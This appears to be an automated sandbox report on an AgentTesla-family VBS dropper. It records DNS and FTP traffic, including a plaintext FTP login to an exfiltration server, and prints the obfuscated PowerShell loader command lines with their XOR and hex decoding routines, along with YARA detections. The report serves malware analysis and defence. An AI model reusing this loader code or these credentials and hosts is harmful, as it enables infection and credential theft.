                    MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
                    SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
                    SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
                    SHA512:b6bbcd0f8e6fa19acc91441f41f9f277a11399b15071ce06acbae4771954bba33e0acf7ee279498bfd701a3beec55c54687a25c579a54be9adcbfa2c133731f8
                    SSDEEP:6144:T2J71kKaq/0xBIAbO0uzJ44bQ+YwMpXj/3CAS/Sv5Hx5QS:TBKd/0UAbO0q44jkTbvL5QS
                    TLSH:CF645990AD3B55900E4BA71AFBF149CD4FF30FE3F1012F9B29B45246372A3689A19197
                    File Content Preview:Smigesparcelwisecisal = ChrW(11202)......on error resume next ..Tilendebringerlateenrigg186 = FileLen("Lassoers89")......Dveskolenliveborns = Ucase(Trim(Mid("Referencerne",27,150)) ) ......BESPARINGERNESUNDERSPR = Space(35)....'LIVSFRELSERNE Concocted BYG
                    Icon Hash:e8d69ece869a9ec4
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Dec 1, 2022 15:50:07.807889938 CET | 53604 | 53 | 192.168.11.20 | 1.1.1.1
                    Dec 1, 2022 15:50:07.826406956 CET | 53 | 53604 | 1.1.1.1 | 192.168.11.20
                    Dec 1, 2022 15:50:15.606538057 CET | 52412 | 53 | 192.168.11.20 | 1.1.1.1
                    Dec 1, 2022 15:50:15.837896109 CET | 53 | 52412 | 1.1.1.1 | 192.168.11.20
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Dec 1, 2022 15:50:07.807889938 CET | 192.168.11.20 | 1.1.1.1 | 0xab96 | Standard query (0) | b3solutionscws.com | A (IP address) | IN (0x0001) | false
                    Dec 1, 2022 15:50:15.606538057 CET | 192.168.11.20 | 1.1.1.1 | 0xa887 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Dec 1, 2022 15:50:07.826406956 CET | 1.1.1.1 | 192.168.11.20 | 0xab96 | No error (0) | b3solutionscws.com |  | 192.185.145.188 | A (IP address) | IN (0x0001) | false
                    Dec 1, 2022 15:50:15.837896109 CET | 1.1.1.1 | 192.168.11.20 | 0xa887 | No error (0) | ftp.mcmprint.net |  | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                    • b3solutionscws.com
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                    Dec 1, 2022 15:50:15.910717964 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                        220-You are user number 2 of 50 allowed.
                        220-Local time is now 16:50. Server port: 21.
                        220-This is a private system - No anonymous login
                        220-IPv6 connections are also welcome on this server.
                        220 You will be disconnected after 15 minutes of inactivity.
                    Dec 1, 2022 15:50:15.911051989 CET | 49825 | 21 | 192.168.11.20 | 185.31.121.136 | USER noffice@mcmprint.net
                    Dec 1, 2022 15:50:15.943161011 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 331 User noffice@mcmprint.net OK. Password required
                    Dec 1, 2022 15:50:15.943381071 CET | 49825 | 21 | 192.168.11.20 | 185.31.121.136 | PASS 2K-0}h.[5hb)
                    Dec 1, 2022 15:50:19.780215979 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 530 Login authentication failed
                    Dec 1, 2022 15:50:19.816060066 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 530 Logout.


                    Target ID:0
                    Start time:15:50:14
                    Start date:01/12/2022
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
                    Imagebase:0x7ff6961b0000
                    File size:170496 bytes
                    MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:2
                    Start time:15:50:34
                    Start date:01/12/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """[obfuscated script string]""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;}
                    Imagebase:0x7ff7287a0000
                    File size:452608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:moderate

                    Target ID:3
                    Start time:15:50:34
                    Start date:01/12/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7b44d0000
                    File size:875008 bytes
                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:4
                    Start time:15:50:36
                    Start date:01/12/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):
                    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);} [hex-encoded script body] $Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs; [hex-encoded script body]
                    Imagebase:
                    File size:433152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:7
                    Start time:15:50:54
                    Start date:01/12/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                    Imagebase:0x9b0000
                    File size:106496 bytes
                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    No disassembly